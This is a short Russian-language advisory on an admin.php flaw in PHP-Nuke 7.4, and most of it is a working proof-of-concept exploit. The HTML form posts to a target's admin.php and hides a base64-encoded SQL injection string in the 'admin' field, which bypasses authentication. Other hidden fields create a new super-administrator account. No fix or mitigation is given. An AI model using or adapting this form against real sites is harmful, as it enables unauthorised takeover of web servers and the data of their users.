Программа: PHP-Nuke 7.4 

Уязвимость обнаружена в PHP-Nuke в ‘admin.php’ сценарии. Удаленный пользователь может создать учетную запись с административными привилегиями.
Удаленный пользователь может представить специально обработанный POST запрос к ‘admin.php’, чтобы добавить учетную запись пользователя с административными привилегиями: 

<form name=»mantra» method=»POST» action=»http://www.sitewithphpnuke.com/admin.php»>
<p>USERNAME: <input type=»text» name=»add_aid»>
<br>
NOME: 
<input type=»text» name=»add_name»>
<br>
PASSWORD: 
<input type=»text» name=»add_pwd»>
<br>
E-MAIL: 
<input type=»text» name=»add_email»>
<br>
<input type=»hidden» name=»admin» value=»eCcgVU5JT04gU0VMRUNUIDEvKjox»>
<br>
<input type=»hidden» name=»add_radminsuper» value=»1″>
<br>
<input type=»hidden» name=»op» value=»AddAuthor»>
</p>
<p>
<input type=»submit» name=»Submit» value=»Create Admin»>
<br>
</p>
</form>



Оставить мнение